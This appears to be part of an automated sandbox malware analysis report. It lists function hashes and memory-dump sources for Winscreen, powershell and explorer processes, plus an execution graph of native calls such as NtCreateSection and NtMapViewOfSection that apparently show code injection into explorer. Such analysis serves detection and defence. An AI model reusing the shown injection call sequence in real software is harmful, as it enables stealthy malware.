                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 08c9a0f0f7650c7fa806f5d8efe4d37f9f7e23f55f7bfc13a212de17d7481ba5
                                                                                        • Instruction ID: d5f9217fe7461fed20ee79987d51c0c54af7ec42cc74e8bd3b07e2741fa7f414
                                                                                        • Opcode Fuzzy Hash: 08c9a0f0f7650c7fa806f5d8efe4d37f9f7e23f55f7bfc13a212de17d7481ba5
                                                                                        • Instruction Fuzzy Hash: 6731343272862A0FEBBCFA5D94E557A62C2EFD4350711013ED94BC77D1DE51AC068384
                                                                                        Function 00007FF848F00BD8 Relevance: .1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e67edab9049f79bdc2c1fa1144df2e2658ffe1d029cb28af5bb7b45abf99694
                                                                                        • Instruction ID: 6d4916dd3377a601b13a4f9cc4f7f568d17af90e6e280deaee150cf9fcea2ee4
                                                                                        • Opcode Fuzzy Hash: 9e67edab9049f79bdc2c1fa1144df2e2658ffe1d029cb28af5bb7b45abf99694
                                                                                        • Instruction Fuzzy Hash: C8319075B1C7060FE79CB9AD6CC803161C6EB99251B15417AD50FC73DAFE849C064189

                                                                                        Executed Functions

                                                                                        Function 00007FF848FF4370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2116279211.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ;&I
                                                                                        • API String ID: 0-3485430039
                                                                                        • Opcode ID: eea0ddf8f162bc7a2571d9937555826be1c490472d196565530f872d1611b90d
                                                                                        • Instruction ID: efcedbba550f49859761bb4e3fb8983ab08f7544f26f9d138335d51ad55c50ba
                                                                                        • Opcode Fuzzy Hash: eea0ddf8f162bc7a2571d9937555826be1c490472d196565530f872d1611b90d
                                                                                        • Instruction Fuzzy Hash: A0414532E0DA494FE7A9EB2CA4506B477E1EF64760F0901BBC65DC71D3EB18AC208395
                                                                                        Function 00007FF848FF43BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2116279211.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ;&I
                                                                                        • API String ID: 0-3485430039
                                                                                        • Opcode ID: ba1aa3078c897e5ebdcbd5c13af4da16f9327223bbd171a84000471d80bbf4ad
                                                                                        • Instruction ID: f26dc1b331a807d7b7fa33da0964f5ae541c9f35b2af1e29245c61a490ff4e89
                                                                                        • Opcode Fuzzy Hash: ba1aa3078c897e5ebdcbd5c13af4da16f9327223bbd171a84000471d80bbf4ad
                                                                                        • Instruction Fuzzy Hash: B5112932D0D5464FE795EB2CA4505B477E0FF64360F4900B7D61DD71E2DB18AC108395
                                                                                        Function 00007FF848FF660A Relevance: .4, Instructions: 413COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2116279211.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7b9b0e695b199c56f348bb722f07c239f3e638d632718b6883e13c5b25fc29f8
                                                                                        • Instruction ID: d0727eb770f2ecdb517acced7bf3bbd996177f5cd10fb93aba78dc7fc48d80f2
                                                                                        • Opcode Fuzzy Hash: 7b9b0e695b199c56f348bb722f07c239f3e638d632718b6883e13c5b25fc29f8
                                                                                        • Instruction Fuzzy Hash: C0C12131D0EA8A5FE799AB2858155B9BBA1EF19390F1801BFD10DCB1D3EE1CA805C355
                                                                                        Function 00007FF848F29EF3 Relevance: .3, Instructions: 278COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2115786225.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf601ecf94d069def946382762dc604a99b30d790e4c5bac87433bb6c3701052
                                                                                        • Instruction ID: 057a74aaca051610a422b6ae36a8be6dc6354e0dff8def4a61695416e123ef04
                                                                                        • Opcode Fuzzy Hash: bf601ecf94d069def946382762dc604a99b30d790e4c5bac87433bb6c3701052
                                                                                        • Instruction Fuzzy Hash: BE811E33D0E9968FE356FB7CB8660E57790EF117B9F0802B2C48C4E0D3EE1958568659
                                                                                        Function 00007FF848FF664D Relevance: .2, Instructions: 248COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2116279211.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 02e0f2fc4296365cb825231112fa2ed2fc69aa5b4c201f73c5ca1e7b4a20a8f0
                                                                                        • Instruction ID: b6336797d32a05e94bd3be5340d1f27df75605b66890abc7f8e6aa1e026a9241
                                                                                        • Opcode Fuzzy Hash: 02e0f2fc4296365cb825231112fa2ed2fc69aa5b4c201f73c5ca1e7b4a20a8f0
                                                                                        • Instruction Fuzzy Hash: D781DF31D0EA8A5FE79AAB2858545347AA1EF19790F1800FED10DCB1D3EE1CAC45C35A
                                                                                        Function 00007FF848FF4073 Relevance: .2, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2116279211.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3bd4ab2543cb07fb7b99e068140d068a847b8ce3fe362c450bf8a03adb775c21
                                                                                        • Instruction ID: 6e14328b866e35cb651835f26a9cf67f103f195b0410387df5d4f6096039ebed
                                                                                        • Opcode Fuzzy Hash: 3bd4ab2543cb07fb7b99e068140d068a847b8ce3fe362c450bf8a03adb775c21
                                                                                        • Instruction Fuzzy Hash: E851F332A0DA4A4FE79AEB1C945167577E2FFA5260F1801BBD20EC72D3DF18E8158249
                                                                                        Function 00007FF848E0E380 Relevance: .1, Instructions: 128COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2115286959.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848e0d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3af285be06995bfd099330fc050414be5dc06fbeea9ed3bffbce9906e2a2b138
                                                                                        • Instruction ID: e6a1ac323768b21bf680f77befaa62dc28a80c08bac4b570e6c2c1bd2e8aaf37
                                                                                        • Opcode Fuzzy Hash: 3af285be06995bfd099330fc050414be5dc06fbeea9ed3bffbce9906e2a2b138
                                                                                        • Instruction Fuzzy Hash: 7541E17180DBC54FE7569B2898459523FB0EF53360F1506FFD088CB1A3E629A846C792
                                                                                        Function 00007FF848F29768 Relevance: .1, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2115786225.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3180aaa3619c4ee6ad162918565be5372a0b23368b8a33d914da7eee66dab59d
                                                                                        • Instruction ID: 8dce78ed57f579b331abbb13ff8dc621b46f8000bc461d670a067131c638afaa
                                                                                        • Opcode Fuzzy Hash: 3180aaa3619c4ee6ad162918565be5372a0b23368b8a33d914da7eee66dab59d
                                                                                        • Instruction Fuzzy Hash: 3731F63191CB488FDB5C9F1CA8066B97BE0FB99710F00822FE44993291CB31A856CBC6
                                                                                        Function 00007FF848F2A47C Relevance: .1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2115786225.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 643ee57795861b352335b6b340f7161f26ef6d2e286530060e6e9d220cdf4815
                                                                                        • Instruction ID: 25aac1e855073d40b73e9b2d62820d3a113dafd5fe34946b65104c439237d2d1
                                                                                        • Opcode Fuzzy Hash: 643ee57795861b352335b6b340f7161f26ef6d2e286530060e6e9d220cdf4815
                                                                                        • Instruction Fuzzy Hash: 8C214B7080D7884FE709DB689C4AAF97FA4DF53330F08429ED085CB1A3DA79944AC761
                                                                                        Function 00007FF848FF40BF Relevance: .1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2116279211.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 856d17f07e54c50d6ac64f5af645ea3ffad894795ee42a9062e0faf7c576e556
                                                                                        • Instruction ID: 49b5aa2bd724eb050bd5d2bcb6a6ac90369208bdad76e001d16a509604ee30fe
                                                                                        • Opcode Fuzzy Hash: 856d17f07e54c50d6ac64f5af645ea3ffad894795ee42a9062e0faf7c576e556
                                                                                        • Instruction Fuzzy Hash: 8021CE32E0DA4B4FE3AAEB18945157466D2FF743A0F5901BBE21DC72E2CF18EC048649
                                                                                        Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2115786225.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                        • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                        • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                        • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46

                                                                                        Non-executed Functions

                                                                                        Function 00007FF848F28BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2115786225.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                        • API String ID: 0-622050427
                                                                                        • Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                                        • Instruction ID: 4b251d57f47bb37acb7270bcb3fcd5e7a9f7ff78876cdeb73e676b5544b6a454
                                                                                        • Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                                        • Instruction Fuzzy Hash: 6C213B7761A465DED3427B7DB8045DA3750DF942B8B8503B2E098CF083FE1C70868AD4

                                                                                        Execution Graph

                                                                                        Execution Coverage:6.4%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:36
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 20690 7ff848f557fd 20691 7ff848f5580b NtOpenFile 20690->20691 20693 7ff848f5590e 20691->20693 20706 7ff848f55a9d 20707 7ff848f55abf NtQuerySystemInformation 20706->20707 20709 7ff848f55b6d 20707->20709 20718 7ff848f55e38 20719 7ff848f55e41 NtDeviceIoControlFile 20718->20719 20721 7ff848f55f5e 20719->20721 20726 7ff848f55258 20727 7ff848f55261 NtProtectVirtualMemory 20726->20727 20729 7ff848f55355 20727->20729 20730 7ff848f555d8 20731 7ff848f555e1 NtUnmapViewOfSection 20730->20731 20733 7ff848f5568e 20731->20733 20694 7ff848f54f79 20695 7ff848f54f8f NtQueryInformationProcess 20694->20695 20697 7ff848f5504a 20695->20697 20702 7ff848f55389 20703 7ff848f55397 NtAllocateVirtualMemory 20702->20703 20705 7ff848f5548b 20703->20705 20714 7ff848f55d29 20715 7ff848f55d37 NtQueryVolumeInformationFile 20714->20715 20717 7ff848f55e07 20715->20717 20734 7ff848f55174 20735 7ff848f5517d NtClose 20734->20735 20737 7ff848f55226 20735->20737 20698 7ff848f55080 20699 7ff848f55089 NtSetInformationThread 20698->20699 20701 7ff848f55141 20699->20701 20710 7ff848f55ba0 20711 7ff848f55ba9 NtMapViewOfSection 20710->20711 20713 7ff848f55cf4 20711->20713 20722 7ff848f55941 20723 7ff848f5594f NtCreateSection 20722->20723 20725 7ff848f55a67 20723->20725

                                                                                        Executed Functions

                                                                                        Function 00007FF848F55BA0 Relevance: 1.7, APIs: 1, Instructions: 177nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: 3f9b2e895c111df52c6ab14f26ede55d79de17a952c48e29223d1c3db028c26b
                                                                                        • Instruction ID: 59b3c7d3c065f685acc17942f79eacbae7bf6e8a132c156e75a07ed255e98e97
                                                                                        • Opcode Fuzzy Hash: 3f9b2e895c111df52c6ab14f26ede55d79de17a952c48e29223d1c3db028c26b
                                                                                        • Instruction Fuzzy Hash: 2E51927091CB4C8FDB58EF5898466ADBBF1FB99310F1042AEE449D3256CB70A8458BC6
                                                                                        Function 00007FF848F55941 Relevance: 1.7, APIs: 1, Instructions: 160nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateSection
                                                                                        • String ID:
                                                                                        • API String ID: 2449625523-0
                                                                                        • Opcode ID: 69b26845075e75a9dd15a29fc89714bbc0566d537cdb6a903a2199a27d42137a
                                                                                        • Instruction ID: a4af8d63b6804494cd403c70ef45bd3fbd97d1e11b36b8ce21fc62aa5b87053f
                                                                                        • Opcode Fuzzy Hash: 69b26845075e75a9dd15a29fc89714bbc0566d537cdb6a903a2199a27d42137a
                                                                                        • Instruction Fuzzy Hash: F541B43190CB4C8FDB58EF58D8456ED7BE1EB99320F0442AEE44DD3296CB74A8458B86
                                                                                        Function 00007FF848F55E38 Relevance: 1.7, APIs: 1, Instructions: 158filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: ControlDeviceFile
                                                                                        • String ID:
                                                                                        • API String ID: 3512290074-0
                                                                                        • Opcode ID: f05ca348c8af3054536b8cde956b6f52099b9912de61cb8b3a866e01f926d525
                                                                                        • Instruction ID: 51ebc23c3c8ebe0a4539dbb8f88d7594f2a3b5d91f52eb248ed4cba410c1367a
                                                                                        • Opcode Fuzzy Hash: f05ca348c8af3054536b8cde956b6f52099b9912de61cb8b3a866e01f926d525
                                                                                        • Instruction Fuzzy Hash: 1541C07091CB4C8FDB58EF5898466EDBBF1FB99320F04426EE449D3252CB74A8418BC6
                                                                                        Function 00007FF848F557FD Relevance: 1.6, APIs: 1, Instructions: 150filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2669468079-0
                                                                                        • Opcode ID: ea35957cfc02c03d06dd878e6ff937a73c053b0e9aed832b00ceaefdba4270a9
                                                                                        • Instruction ID: 2964ca472462ee33c27e945422a088bd5b7713aad180bc0872374c24a1681a36
                                                                                        • Opcode Fuzzy Hash: ea35957cfc02c03d06dd878e6ff937a73c053b0e9aed832b00ceaefdba4270a9
                                                                                        • Instruction Fuzzy Hash: B941F43191CB4C4FDB58EF5898457EDBBE1EB99320F0042AFE44DD3292CB74A8458B86
                                                                                        Function 00007FF848F55389 Relevance: 1.6, APIs: 1, Instructions: 144memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 436dc21da8d4c326cbeb0aadd6429a30fdd078f3017e6e5a60a0f1a34cc970b9
                                                                                        • Instruction ID: 8dd971907bef6a5ed63207c2e447edb371509575ac186f0e567b64ecaab39097
                                                                                        • Opcode Fuzzy Hash: 436dc21da8d4c326cbeb0aadd6429a30fdd078f3017e6e5a60a0f1a34cc970b9
                                                                                        • Instruction Fuzzy Hash: 9D41D63090CB4C8FDB19EF9898456ED7BF1EB95310F0442AFD449D3292CB746845CB86
                                                                                        Function 00007FF848F55258 Relevance: 1.6, APIs: 1, Instructions: 140nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-0
                                                                                        • Opcode ID: 5cff1b0320e971a6e56654f7cdc7cfa0c0dcc3f3c5e2aa7ccf57fc23797ba0b3
                                                                                        • Instruction ID: 20a31d4626a9920b0e1350b71988c85e021ab1b349bf257dc96a7368747dc1b4
                                                                                        • Opcode Fuzzy Hash: 5cff1b0320e971a6e56654f7cdc7cfa0c0dcc3f3c5e2aa7ccf57fc23797ba0b3
                                                                                        • Instruction Fuzzy Hash: 2941D63191CB484FDB18EB5C98066EDBBE1EB99320F00426FE44DD3296DF7468458BD6
                                                                                        Function 00007FF848F55D29 Relevance: 1.6, APIs: 1, Instructions: 132filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformationQueryVolume
                                                                                        • String ID:
                                                                                        • API String ID: 634242254-0
                                                                                        • Opcode ID: 3fa6bd9cff60ada9a4ad23f8fa70bea0a2ebfad444ad0dabe6bd5f2e78c7d35e
                                                                                        • Instruction ID: 29691e3409511bf189efcebcd1de2a0792b7a7cf1bc45b38699ce83116fce909
                                                                                        • Opcode Fuzzy Hash: 3fa6bd9cff60ada9a4ad23f8fa70bea0a2ebfad444ad0dabe6bd5f2e78c7d35e
                                                                                        • Instruction Fuzzy Hash: 2641D63190CB8C4FDB19EB68984A6E9BBE1FF56310F04426FD449C3292DB7468558B86
                                                                                        Function 00007FF848F54F79 Relevance: 1.6, APIs: 1, Instructions: 125nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 1778838933-0
                                                                                        • Opcode ID: d5a9a999846b0ede3d61cc534c0d0824a7efa837257267583d880bf605e60890
                                                                                        • Instruction ID: d58a61698509aa63dec9cc8612e4544fd1f9ae44d84e9e6dae4c0548e563797b
                                                                                        • Opcode Fuzzy Hash: d5a9a999846b0ede3d61cc534c0d0824a7efa837257267583d880bf605e60890
                                                                                        • Instruction Fuzzy Hash: 9631077191CB4C4FDB18EF5C980A6ED7BE1EB95321F00426FE049C3252CB34A8468BD6
                                                                                        Function 00007FF848F55A9D Relevance: 1.6, APIs: 1, Instructions: 124nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 3562636166-0
                                                                                        • Opcode ID: ca21bccbf7eff694d17a858875463a92ce7a90368b393dcd87a824bfaa8e0cd6
                                                                                        • Instruction ID: 7aa163f4a8a526e71df2d37430e078c8b5c5e139a696dd15bf41da41dabf7b37
                                                                                        • Opcode Fuzzy Hash: ca21bccbf7eff694d17a858875463a92ce7a90368b393dcd87a824bfaa8e0cd6
                                                                                        • Instruction Fuzzy Hash: 4D31083191DB884FDB18EB5C98456FD7BE1EB95320F04436FE049C3292CB7468458786
                                                                                        Function 00007FF848F55080 Relevance: 1.6, APIs: 1, Instructions: 120nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationThread
                                                                                        • String ID:
                                                                                        • API String ID: 4046476035-0
                                                                                        • Opcode ID: ab432f90934c95e5eceb2933a8014e3c393765e5aa5671e636ce1704eb4183de
                                                                                        • Instruction ID: de8eaf25188b21e49cce9425093c0e50db28889a327103f78d42572f27658843
                                                                                        • Opcode Fuzzy Hash: ab432f90934c95e5eceb2933a8014e3c393765e5aa5671e636ce1704eb4183de
                                                                                        • Instruction Fuzzy Hash: A6313A3190CA4C4FEB1CABA8980A6F9BBE1EB55321F00426FD049C3592DB74B8568BD5
                                                                                        Function 00007FF848F555D8 Relevance: 1.6, APIs: 1, Instructions: 113nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionUnmapView
                                                                                        • String ID:
                                                                                        • API String ID: 498011366-0
                                                                                        • Opcode ID: b2a5aa9c781169502fc174fa94614260e038d6a18a4d01dba2f92c65bc7084d6
                                                                                        • Instruction ID: 2ff92f056083516217bb4d68c2b99f7a35cfdda9c64f2f4cfa67cb97ebe621b6
                                                                                        • Opcode Fuzzy Hash: b2a5aa9c781169502fc174fa94614260e038d6a18a4d01dba2f92c65bc7084d6
                                                                                        • Instruction Fuzzy Hash: 8631EA3190CB484FEB28EB68984A6FABBE1EB55321F00417FD04AC3593DF7468468B95
                                                                                        Function 00007FF848F55174 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2179141833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 745733d7aec9154f3031109acbbe0cb1b066d99c479bd4f408ef37ca478d68b7
                                                                                        • Instruction ID: f3cbb5f7463b3204f12b466a6e94a84bc9c20e2217544ffdf62740df09ced4a9
                                                                                        • Opcode Fuzzy Hash: 745733d7aec9154f3031109acbbe0cb1b066d99c479bd4f408ef37ca478d68b7
                                                                                        • Instruction Fuzzy Hash: 9831253190C74C4FEB59EBA8884A7EEBBE1EB56320F04416FD049C7193DB786805CB91
                                                                                        Function 00007FF848FF0159 Relevance: .1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2180382670.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ff848ff0000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dbbbc11c1d816ad4392ba9161479b132941217cff0de04381e3ac873f3f3db44
                                                                                        • Instruction ID: 9c5fd5218528bdd048a161899c9631174a267ee4c2836c7d91ea5f49e4b300a1
